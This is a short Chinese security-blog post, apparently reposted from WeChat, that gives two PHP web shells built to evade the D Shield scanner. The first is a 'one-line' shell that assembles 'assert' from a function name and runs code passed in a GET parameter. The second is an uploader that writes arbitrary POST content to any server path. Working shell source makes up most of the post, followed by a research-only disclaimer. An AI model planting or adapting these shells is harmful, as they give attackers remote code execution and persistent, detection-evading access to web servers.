前言
PHP一句话马
1.代码
<?php class test{ function assert(){ // 方式一 //$a = getenv('HTTP_E'); //return $a; // 方式二 $a = substr(__FUNCTION__,0,6); return $a; } function foo(&$var) { $var = $_GET['a']; return $var; } } $a = new test(); $c = $a->assert(); $d = ""; $d = $a->foo($d); $c($d);?>2.免杀思路
方式一
免杀效果
方式二
免杀效果
PHP上传小马
1. 代码
<?phpheader("content-type:text/html;charset=utf-8");class test{function test(){return '干扰类';}}@$rode = $_POST['rode'];@$content = $_POST['content'];if(@file_put_contents($rode,$content)){echo '上传成功';}?><html><body><form action='' method='POST'>小马路径<?php echo ':' . __FILE__;?><br>上传路径:<input type='text' name='rode'/><br>内容:<textarea name='content'></textarea><br><input type='submit' value='write'/></form></body></html>
2. 免杀思路
免杀效果
扫码进交流群
原文始发于微信公众号(菜鸟学安全):过D盾一句话+上传小马
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论